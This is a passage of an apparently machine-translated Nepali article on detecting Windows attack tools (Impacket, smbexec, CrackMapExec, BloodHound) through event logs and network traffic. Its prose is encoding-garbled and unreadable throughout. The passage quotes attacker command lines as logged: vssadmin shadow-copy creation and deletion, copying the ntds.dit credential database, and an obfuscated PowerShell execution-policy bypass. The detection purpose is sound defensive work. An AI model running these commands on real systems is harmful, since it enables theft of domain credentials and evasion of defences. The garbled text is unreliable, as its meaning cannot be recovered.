4. 4688 - vssadmin рд╕реБрд░реБ рдЧрд░реНрдиреЗ cmd.exe рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджреИ:

тАЬC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - рдЖрджреЗрд╢рдХреЛ рд╕рд╛рде рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджреИ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - рдЖрджреЗрд╢рдХреЛ рд╕рд╛рде рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджреИ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - рдЖрджреЗрд╢рдХреЛ рд╕рд╛рде рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджреИ:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

рдзреЗрд░реИ рдкреЛрд╕реНрдЯ-рд╢реЛрд╖рдг рдЙрдкрдХрд░рдгрд╣рд░реВ рдЬрд╕реНрддреИ, рдЗрдореНрдкреНрдпрд╛рдХреЗрдЯрдорд╛ рд░рд┐рдореЛрдЯ рдЖрджреЗрд╢ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдирдХреЛ рд▓рд╛рдЧрд┐ рдореЛрдбреНрдпреБрд▓рд╣рд░реВ рдЫрдиреНред рд╣рд╛рдореА smbexec рдорд╛ рдлреЛрдХрд╕ рдЧрд░реНрдиреЗрдЫреМрдВ, рдЬрд╕рд▓реЗ рд░рд┐рдореЛрдЯ рдореЗрд╕рд┐рдирдорд╛ рдЕрдиреНрддрд░рдХреНрд░рд┐рдпрд╛рддреНрдордХ рдЖрджреЗрд╢ рд╢реЗрд▓ рдкреНрд░рджрд╛рди рдЧрд░реНрджрдЫред рдпреЛ рдореЛрдбреНрдпреБрд▓рд▓рд╛рдИ рдкрд╛рд╕рд╡рд░реНрдб рд╡рд╛ рдкрд╛рд╕рд╡рд░реНрдб рд╣реНрдпрд╛рд╕рдХреЛ рд╕рд╛рде SMB рдорд╛рд░реНрдлрдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдкрдирд┐ рдЪрд╛рд╣рд┐рдиреНрдЫред рдЪрд┐рддреНрд░рдорд╛ред 3 рд╣рд╛рдореАрд▓реЗ рдпрд╕реНрддреЛ рдЙрдкрдХрд░рдг рдХрд╕рд░реА рдХрд╛рдо рдЧрд░реНрдЫ рднрдиреНрдиреЗ рдЙрджрд╛рд╣рд░рдг рджреЗрдЦреНрдЫреМрдВ, рдпрд╕ рдЕрд╡рд╕реНрдерд╛рдорд╛ рдпреЛ рд╕реНрдерд╛рдиреАрдп рдкреНрд░рд╢рд╛рд╕рдХ рдХрдиреНрд╕реЛрд▓ рд╣реЛред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 3. рдЕрдиреНрддрд░рдХреНрд░рд┐рдпрд╛рддреНрдордХ smbexec рдХрдиреНрд╕реЛрд▓

рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдкрдЫрд┐ smbexec рдХреЛ рдкрд╣рд┐рд▓реЛ рдЪрд░рдг OpenSCManagerW рдЖрджреЗрд╢ (15) рдХреЛ рд╕рд╛рде SCM рдЦреЛрд▓реНрдиреБ рд╣реЛред рдкреНрд░рд╢реНрди рдЙрд▓реНрд▓реЗрдЦрдиреАрдп рдЫ: MachineName рдлрд┐рд▓реНрдб DUMMY рд╣реЛред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 4. рд╕реЗрд╡рд╛ рдирд┐рдпрдиреНрддреНрд░рдг рдкреНрд░рдмрдиреНрдзрдХ рдЦреЛрд▓реНрди рдЕрдиреБрд░реЛрдз рдЧрд░реНрдиреБрд╣реЛрд╕реН

рдЕрд░реНрдХреЛ, рд╕реЗрд╡рд╛ CreateServiceW рдЖрджреЗрд╢ (12) рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░рд┐рдПрдХреЛ рдЫред smbexec рдХреЛ рдорд╛рдорд▓рд╛ рдорд╛, рд╣рд╛рдореА рдкреНрд░рддреНрдпреЗрдХ рдкрдЯрдХ рд╕рдорд╛рди рдЖрджреЗрд╢ рдирд┐рд░реНрдорд╛рдг рддрд░реНрдХ рджреЗрдЦреНрди рд╕рдХреНрдЫреМрдВред рдЪрд┐рддреНрд░рдорд╛ред 5 рд╣рд░рд┐рдпреЛрд▓реЗ рдЕрдкрд░рд┐рд╡рд░реНрддрдиреАрдп рдЖрджреЗрд╢ рдкреНрдпрд╛рд░рд╛рдорд┐рдЯрд░рд╣рд░реВ рд╕рдВрдХреЗрдд рдЧрд░реНрджрдЫ, рдкрд╣реЗрдВрд▓реЛрд▓реЗ рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛рд▓реЗ рдХреЗ рдкрд░рд┐рд╡рд░реНрддрди рдЧрд░реНрди рд╕рдХреНрдЫ рднрдиреЗрд░ рд╕рдВрдХреЗрдд рдЧрд░реНрджрдЫред рдпреЛ рджреЗрдЦреНрди рд╕рдЬрд┐рд▓реЛ рдЫ рдХрд┐ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдирдпреЛрдЧреНрдп рдлрд╛рдЗрд▓рдХреЛ рдирд╛рдо, рдпрд╕рдХреЛ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реА рд░ рдЖрдЙрдЯрдкреБрдЯ рдлрд╛рдЗрд▓ рдкрд░рд┐рд╡рд░реНрддрди рдЧрд░реНрди рд╕рдХрд┐рдиреНрдЫ, рддрд░ рдмрд╛рдБрдХреА рдЗрдореНрдкреНрдпрд╛рдХреЗрдЯ рдореЛрдбреНрдпреБрд▓рдХреЛ рддрд░реНрдХрд▓рд╛рдИ рдЧрдбрдмрдб рдирдЧрд░реА рдкрд░рд┐рд╡рд░реНрддрди рдЧрд░реНрди рдзреЗрд░реИ рдЧрд╛рд╣реНрд░реЛ рдЫред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 5. рд╕реЗрд╡рд╛ рдирд┐рдпрдиреНрддреНрд░рдг рдкреНрд░рдмрдиреНрдзрдХ рдкреНрд░рдпреЛрдЧ рдЧрд░реА рд╕реЗрд╡рд╛ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрди рдЕрдиреБрд░реЛрдз рдЧрд░реНрдиреБрд╣реЛрд╕реН

Smbexec рд▓реЗ Windows рдШрдЯрдирд╛ рд▓рдЧрдорд╛ рд╕реНрдкрд╖реНрдЯ рдЯреНрд░реЗрд╕рд╣рд░реВ рдкрдирд┐ рдЫреЛрдбреНрдЫред ipconfig рдЖрджреЗрд╢рдХреЛ рд╕рд╛рде рдЕрдиреНрддрд░рдХреНрд░рд┐рдпрд╛рддреНрдордХ рдЖрджреЗрд╢ рд╢реЗрд▓рдХреЛ рд▓рд╛рдЧрд┐ Windows рд╕рд░реНрднрд░ 2016 рд▓рдЧ рдорд╛, рд╣рд╛рдореА рдШрдЯрдирд╛рд╣рд░реВрдХреЛ рдирд┐рдореНрди рдХреБрдЮреНрдЬреА рдЕрдиреБрдХреНрд░рдо рджреЗрдЦреНрдиреЗрдЫреМрдВ:

1. 4697 - рдкреАрдбрд┐рддрдХреЛ рдореЗрд╕рд┐рдирдорд╛ рд╕реЗрд╡рд╛рдХреЛ рд╕реНрдерд╛рдкрдирд╛:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - рдмрд┐рдиреНрджреБ 1 рдмрд╛рдЯ рддрд░реНрдХ рд╕рдВрдЧ cmd.exe рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рдирд┐рд░реНрдорд╛рдгред
3. 5145 - C$ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдорд╛ __рдЖрдЙрдЯрдкреБрдЯ рдлрд╛рдЗрд▓рдорд╛ рдкрд╣реБрдБрдЪ рдЕрдзрд┐рдХрд╛рд░ рдЬрд╛рдБрдЪ рдЧрд░реНрджреИред
4. 4697 - рдкреАрдбрд┐рддрдХреЛ рдореЗрд╕рд┐рдирдорд╛ рд╕реЗрд╡рд╛рдХреЛ рд╕реНрдерд╛рдкрдирд╛ред

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - рдмрд┐рдиреНрджреБ 4 рдмрд╛рдЯ рддрд░реНрдХ рд╕рдВрдЧ cmd.exe рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЛ рдирд┐рд░реНрдорд╛рдгред
6. 5145 - C$ рдбрд╛рдЗрд░реЗрдХреНрдЯрд░реАрдорд╛ __рдЖрдЙрдЯрдкреБрдЯ рдлрд╛рдЗрд▓рдорд╛ рдкрд╣реБрдБрдЪ рдЕрдзрд┐рдХрд╛рд░ рдЬрд╛рдБрдЪ рдЧрд░реНрджреИред

рдЗрдореНрдкреНрдпрд╛рдХреЗрдЯ рдЖрдХреНрд░рдордг рдЙрдкрдХрд░рдгрд╣рд░реВрдХреЛ рд╡рд┐рдХрд╛рд╕рдХреЛ рд▓рд╛рдЧрд┐ рдЖрдзрд╛рд░ рд╣реЛред рдпрд╕рд▓реЗ Windows рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рд▓рдЧрднрдЧ рд╕рдмреИ рдкреНрд░реЛрдЯреЛрдХрд▓рд╣рд░реВрд▓рд╛рдИ рд╕рдорд░реНрдерди рдЧрд░реНрджрдЫ рд░ рдПрдХреИ рд╕рдордпрдорд╛ рдпрд╕рдХреЛ рдЖрдлреНрдиреИ рд╡рд┐рд╢реЗрд╖рддрд╛ рд╕реБрд╡рд┐рдзрд╛рд╣рд░реВ рдЫрдиреНред рдпрд╣рд╛рдБ рд╡рд┐рд╢рд┐рд╖реНрдЯ winreg рдЕрдиреБрд░реЛрдзрд╣рд░реВ рдЫрдиреН, рд░ SCM API рдХреЛ рд╡рд┐рд╢реЗрд╖рддрд╛ рдЖрджреЗрд╢ рдЧрдарди, рд░ рдлрд╛рдЗрд▓ рдирд╛рдо рдврд╛рдБрдЪрд╛, рд░ SMB рд╕рд╛рдЭреЗрджрд╛рд░реА SYSTEM32 рдХреЛ рдкреНрд░рдпреЛрдЧред

CRACKMAPEXEC

CME рдЙрдкрдХрд░рдг рдореБрдЦреНрдп рд░реВрдкрдорд╛ рддреА рджрд┐рдирдЪрд░реНрдпрд╛ рдХрд╛рд░реНрдпрд╣рд░реВ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдЧрд░реНрди рдбрд┐рдЬрд╛рдЗрди рдЧрд░рд┐рдПрдХреЛ рд╣реЛ рдЬреБрди рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛рд▓реЗ рдиреЗрдЯрд╡рд░реНрдХ рднрд┐рддреНрд░ рдЕрдЧрд╛рдбрд┐ рдмрдвреНрдирдХреЛ рд▓рд╛рдЧрд┐ рдкреНрд░рджрд░реНрд╢рди рдЧрд░реНрдиреБрдкрд░реНрджрдЫред рдпрд╕рд▓реЗ рддрдкрд╛рдИрдВрд▓рд╛рдИ рдкреНрд░рд╕рд┐рджреНрдз рдПрдореНрдкрд╛рдпрд░ рдПрдЬреЗрдиреНрдЯ рд░ рдорд┐рдЯрд░рдкреНрд░рд┐рдЯрд░рд╕рдБрдЧ рд╕рдВрдпреЛрдЬрдирдорд╛ рдХрд╛рдо рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫред рдЧреБрдкреНрдд рд░реВрдкрдорд╛ рдЖрджреЗрд╢рд╣рд░реВ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдЧрд░реНрди, CME рддрд┐рдиреАрд╣рд░реВрд▓рд╛рдИ рдЕрд╕реНрдкрд╖реНрдЯ рдЧрд░реНрди рд╕рдХреНрдЫред рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдб (рдПрдХ рдЫреБрдЯреНрдЯреИ рдЯреЛрд╣реА рдЙрдкрдХрд░рдг) рдХреЛ рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░, рдПрдХ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрд▓реЗ рд╕рдХреНрд░рд┐рдп рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХ рд╕рддреНрд░рдХреЛ рд▓рд╛рдЧрд┐ рдЦреЛрдЬрд▓рд╛рдИ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдЧрд░реНрди рд╕рдХреНрдЫред

Bloodhound

рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдб, рдПрдХ рд╕реНрдЯреНрдпрд╛рдиреНрдбрдЕрд▓реЛрди рдЙрдкрдХрд░рдгрдХреЛ рд░реВрдкрдорд╛, рдиреЗрдЯрд╡рд░реНрдХ рднрд┐рддреНрд░ рдЙрдиреНрдирдд рдЯреЛрдкрдирдХреЛ рд▓рд╛рдЧрд┐ рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫред рдпрд╕рд▓реЗ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рд╣рд░реВ, рдореЗрд╕рд┐рдирд╣рд░реВ, рд╕рдореВрд╣рд╣рд░реВ, рд╕рддреНрд░рд╣рд░реВрдХреЛ рдмрд╛рд░реЗрдорд╛ рдбреЗрдЯрд╛ рд╕рдЩреНрдХрд▓рди рдЧрд░реНрджрдЫ рд░ PowerShell рд╕реНрдХреНрд░рд┐рдкреНрдЯ рд╡рд╛ рдмрд╛рдЗрдирд░реА рдлрд╛рдЗрд▓рдХреЛ рд░реВрдкрдорд╛ рдЖрдкреВрд░реНрддрд┐ рдЧрд░рд┐рдиреНрдЫред LDAP рд╡рд╛ SMB-рдЖрдзрд╛рд░рд┐рдд рдкреНрд░реЛрдЯреЛрдХрд▓рд╣рд░реВ рдЬрд╛рдирдХрд╛рд░реА рд╕рдЩреНрдХрд▓рди рдЧрд░реНрди рдкреНрд░рдпреЛрдЧ рдЧрд░рд┐рдиреНрдЫред CME рдПрдХреАрдХрд░рдг рдореЛрдбреНрдпреБрд▓рд▓реЗ рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдбрд▓рд╛рдИ рдкреАрдбрд┐рддрдХреЛ рдореЗрд╕рд┐рдирдорд╛ рдбрд╛рдЙрдирд▓реЛрдб рдЧрд░реНрди, рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди рдкрдЫрд┐ рд╕рдЩреНрдХрд▓рди рдбрд╛рдЯрд╛ рдЪрд▓рд╛рдЙрди рд░ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫ, рдЬрд╕рд▓реЗ рдЧрд░реНрджрд╛ рдкреНрд░рдгрд╛рд▓реАрдорд╛ рд╕реНрд╡рдЪрд╛рд▓рд┐рдд рдХрд╛рд░реНрдпрд╣рд░реВ рд╣реБрдиреНрдЫрдиреН рд░ рддрд┐рдиреАрд╣рд░реВрд▓рд╛рдИ рдХрдо рдзреНрдпрд╛рди рджрд┐рди рд╕рдХрд┐рдиреНрдЫред рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдб рдЧреНрд░рд╛рдлрд┐рдХрд▓ рд╢реЗрд▓рд▓реЗ рд╕рдЩреНрдХрд▓рди рдЧрд░рд┐рдПрдХрд╛ рдбрд╛рдЯрд╛рд╣рд░реВрд▓рд╛рдИ рдЧреНрд░рд╛рдлрдХреЛ рд░реВрдкрдорд╛ рдкреНрд░рд╕реНрддреБрдд рдЧрд░реНрджрдЫ, рдЬрд╕рд▓реЗ рддрдкрд╛рдИрдВрд▓рд╛рдИ рдЖрдХреНрд░рдордгрдХрд╛рд░реАрдХреЛ рдореЗрд╕рд┐рдирдмрд╛рдЯ рдбреЛрдореЗрди рдкреНрд░рд╢рд╛рд╕рдХрд╕рдореНрдордХреЛ рдЫреЛрдЯреЛ рдмрд╛рдЯреЛ рдлреЗрд▓рд╛ рдкрд╛рд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 6. рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдб рдЗрдиреНрдЯрд░рдлреЗрд╕

рдкреАрдбрд┐рддрдХреЛ рдореЗрд╕рд┐рдирдорд╛ рдЪрд▓рд╛рдЙрдирдХреЛ рд▓рд╛рдЧрд┐, рдореЛрдбреНрдпреБрд▓рд▓реЗ ATSVC рд░ SMB рдкреНрд░рдпреЛрдЧ рдЧрд░реЗрд░ рдХрд╛рд░реНрдп рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджрдЫред ATSVC Windows Task Scheduler рд╕рдБрдЧ рдХрд╛рдо рдЧрд░реНрдиреЗ рдЗрдиреНрдЯрд░рдлреЗрд╕ рд╣реЛред CME рд▓реЗ рдиреЗрдЯрд╡рд░реНрдХрдорд╛ рдХрд╛рд░реНрдпрд╣рд░реВ рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрди рдпрд╕рдХреЛ NetrJobAdd(1) рдкреНрд░рдХрд╛рд░реНрдп рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫред CME рдореЛрдбреНрдпреБрд▓рд▓реЗ рдХреЗ рдкрдард╛рдЙрдБрдЫ рднрдиреНрдиреЗ рдЙрджрд╛рд╣рд░рдг рдЪрд┐рддреНрд░рдорд╛ рджреЗрдЦрд╛рдЗрдПрдХреЛ рдЫред 7: рдпреЛ XML рдврд╛рдБрдЪрд╛рдорд╛ рддрд░реНрдХрдХреЛ рд░реВрдкрдорд╛ cmd.exe рдЖрджреЗрд╢ рдХрд▓ рд░ рдЕрд╕реНрдкрд╖реНрдЯ рдХреЛрдб рд╣реЛред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд┐рддреНрд░ ренред CME рдорд╛рд░реНрдлрдд рдХрд╛рд░реНрдп рд╕рд┐рд░реНрдЬрдирд╛ рдЧрд░реНрджреИ

рдХрд╛рд░реНрдп рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдирдХреЛ рд▓рд╛рдЧрд┐ рдкреЗрд╢ рдЧрд░рд┐рд╕рдХреЗрдкрдЫрд┐, рдкреАрдбрд┐рддрдХреЛ рдореЗрд╕рд┐рдирд▓реЗ рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдб рдЖрдлреИ рд╕реБрд░реБ рдЧрд░реНрдЫ, рд░ рдпреЛ рдЯреНрд░рд╛рдлрд┐рдХрдорд╛ рджреЗрдЦреНрди рд╕рдХрд┐рдиреНрдЫред рдореЛрдбреНрдпреБрд▓рд▓рд╛рдИ рдорд╛рдирдХ рд╕рдореВрд╣рд╣рд░реВ, рдбреЛрдореЗрдирдорд╛ рд░рд╣реЗрдХрд╛ рд╕рдмреИ рдореЗрд╕рд┐рди рд░ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рд╣рд░реВрдХреЛ рд╕реВрдЪреА, рд░ SRVSVC NetSessEnum рдЕрдиреБрд░реЛрдз рдорд╛рд░реНрдлрдд рд╕рдХреНрд░рд┐рдп рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛ рд╕рддреНрд░рд╣рд░реВрдХреЛ рдмрд╛рд░реЗрдорд╛ рдЬрд╛рдирдХрд╛рд░реА рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди LDAP рдХреНрд╡реЗрд░реАрд╣рд░реВрджреНрд╡рд╛рд░рд╛ рд╡рд┐рд╢реЗрд╖рддрд╛ рдЧрд░рд┐рдПрдХреЛ рдЫред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 8. SMB рдорд╛рд░реНрдлрдд рд╕рдХреНрд░рд┐рдп рд╕рддреНрд░рд╣рд░реВрдХреЛ рд╕реВрдЪреА рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрджреИ

рдердк рд░реВрдкрдорд╛, рдЕрдбрд┐рдЯрд┐рдЩ рд╕рдХреНрд╖рдо рднрдПрдХреЛ рдкреАрдбрд┐рддрдХреЛ рдореЗрд╕рд┐рдирдорд╛ рдмреНрд▓рдбрд╣рд╛рдЙрдиреНрдб рд╕реБрд░реБ рдЧрд░реНрджрд╛ ID 4688 (рдкреНрд░рдХреНрд░рд┐рдпрд╛ рд╕рд┐рд░реНрдЬрдирд╛) рд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛рдХреЛ рдирд╛рдо рднрдПрдХреЛ рдШрдЯрдирд╛рд╕рдБрдЧреИ рд╣реБрдиреНрдЫред ┬лC:WindowsSystem32cmd.exe┬╗ред рдпрд╕рдХреЛ рдмрд╛рд░реЗрдорд╛ рдХреЗ рдЙрд▓реНрд▓реЗрдЦрдиреАрдп рдЫ рдХрдорд╛рдгреНрдб рд▓рд╛рдЗрди рддрд░реНрдХрд╣рд░реВ:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , тАж , 40,41 )-jOIN'' ) "

Enum_avproducts

enum_avproducts рдореЛрдбреНрдпреБрд▓ рдХрд╛рд░реНрдпрдХреНрд╖рдорддрд╛ рд░ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрдирдХреЛ рджреГрд╖реНрдЯрд┐рдХреЛрдгрдмрд╛рдЯ рдзреЗрд░реИ рд░реЛрдЪрдХ рдЫред WMI рд▓реЗ рддрдкрд╛рдИрдВрд▓рд╛рдИ WQL рдХреНрд╡реЗрд░реА рднрд╛рд╖рд╛ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрди рдЕрдиреБрдорддрд┐ рджрд┐рдиреНрдЫ рд╡рд┐рднрд┐рдиреНрди Windows рд╡рд╕реНрддреБрд╣рд░реВрдмрд╛рдЯ рдбрд╛рдЯрд╛ рдкреБрди: рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрди, рдЬреБрди рдЕрдирд┐рд╡рд╛рд░реНрдп рд░реВрдкрдорд╛ рдпреЛ CME рдореЛрдбреНрдпреБрд▓рд▓реЗ рдкреНрд░рдпреЛрдЧ рдЧрд░реНрджрдЫред рдпрд╕рд▓реЗ рдкреАрдбрд┐рддрдХреЛ рдореЗрд╕рд┐рдирдорд╛ рд╕реНрдерд╛рдкрдирд╛ рдЧрд░рд┐рдПрдХрд╛ рд╕реБрд░рдХреНрд╖рд╛ рдЙрдкрдХрд░рдгрд╣рд░реВрдХреЛ рдмрд╛рд░реЗрдорд╛ AntiSpywareProduct рд░ AntiMirusProduct рдХрдХреНрд╖рд╛рд╣рд░реВрдорд╛ рдкреНрд░рд╢реНрдирд╣рд░реВ рдЙрддреНрдкрдиреНрди рдЧрд░реНрдЫред рдЖрд╡рд╢реНрдпрдХ рдбрд╛рдЯрд╛ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрдирдХреЛ рд▓рд╛рдЧрд┐, рдореЛрдбреНрдпреБрд▓ rootSecurityCenter2 рдиреЗрдорд╕реНрдкреЗрд╕рдорд╛ рдЬрдбрд╛рди рд╣реБрдиреНрдЫ, рддреНрдпрд╕рдкрдЫрд┐ WQL рдХреНрд╡реЗрд░реА рдЙрддреНрдкрдиреНрди рдЧрд░реНрджрдЫ рд░ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛ рдкреНрд░рд╛рдкреНрдд рдЧрд░реНрджрдЫред рдЪрд┐рддреНрд░рдорд╛ред рдЪрд┐рддреНрд░ 9 рд▓реЗ рддреНрдпрд╕реНрддрд╛ рдЕрдиреБрд░реЛрдз рд░ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛рд╣рд░реВрдХреЛ рд╕рд╛рдордЧреНрд░реА рджреЗрдЦрд╛рдЙрдБрдЫред рд╣рд╛рдореНрд░реЛ рдЙрджрд╛рд╣рд░рдгрдорд╛, рд╡рд┐рдиреНрдбреЛрдЬ рдбрд┐рдлреЗрдиреНрдбрд░ рдлреЗрд▓рд╛ рдкрд░реНрдпреЛред

рд╡рд┐рдиреНрдбреЛрдЬ рдкреВрд░реНрд╡рд╛рдзрд╛рд░рдорд╛ рдЖрдХреНрд░рдордгрд╣рд░реВ рдХрд╕рд░реА рдкрддреНрддрд╛ рд▓рдЧрд╛рдЙрдиреЗ: рд╣реНрдпрд╛рдХрд░ рдЙрдкрдХрд░рдгрд╣рд░реВ рдЕрдзреНрдпрдпрди рдЧрд░реНрджреИ
рдЪрд╛рдорд▓ред 9. enum_avproducts рдореЛрдбреНрдпреБрд▓рдХреЛ рдиреЗрдЯрд╡рд░реНрдХ рдЧрддрд┐рд╡рд┐рдзрд┐

рдЕрдХреНрд╕рд░, WMI рдЕрдбрд┐рдЯрд┐рдЩ (рдЯреНрд░реЗрд╕ WMI-Activity), рдЬрд╕рдХрд╛ рдШрдЯрдирд╛рд╣рд░реВрдорд╛ рддрдкрд╛рдИрдВрд▓реЗ WQL рдкреНрд░рд╢реНрдирд╣рд░реВрдХреЛ рдмрд╛рд░реЗрдорд╛ рдЙрдкрдпреЛрдЧреА рдЬрд╛рдирдХрд╛рд░реА рдкрд╛рдЙрди рд╕рдХреНрдиреБрд╣реБрдиреНрдЫ, рдЕрд╕рдХреНрд╖рдо рд╣реБрди рд╕рдХреНрдЫред рддрд░ рдпрджрд┐ рдпреЛ рд╕рдХреНрд╖рдо рдкрд╛рд░рд┐рдПрдХреЛ рдЫ рднрдиреЗ, enum_avproducts рд╕реНрдХреНрд░рд┐рдкреНрдЯ рдЪрд▓рд╛рдЗрдПрдХреЛ рдЫ рднрдиреЗ, ID 11 рднрдПрдХреЛ рдШрдЯрдирд╛ рдмрдЪрдд рд╣реБрдиреЗрдЫред рдпрд╕рдорд╛ рдЕрдиреБрд░реЛрдз рдкрдард╛рдЙрдиреЗ рдкреНрд░рдпреЛрдЧрдХрд░реНрддрд╛рдХреЛ рдирд╛рдо рд░ rootSecurityCenter2 рдиреЗрдорд╕реНрдкреЗрд╕рдорд╛ рдирд╛рдо 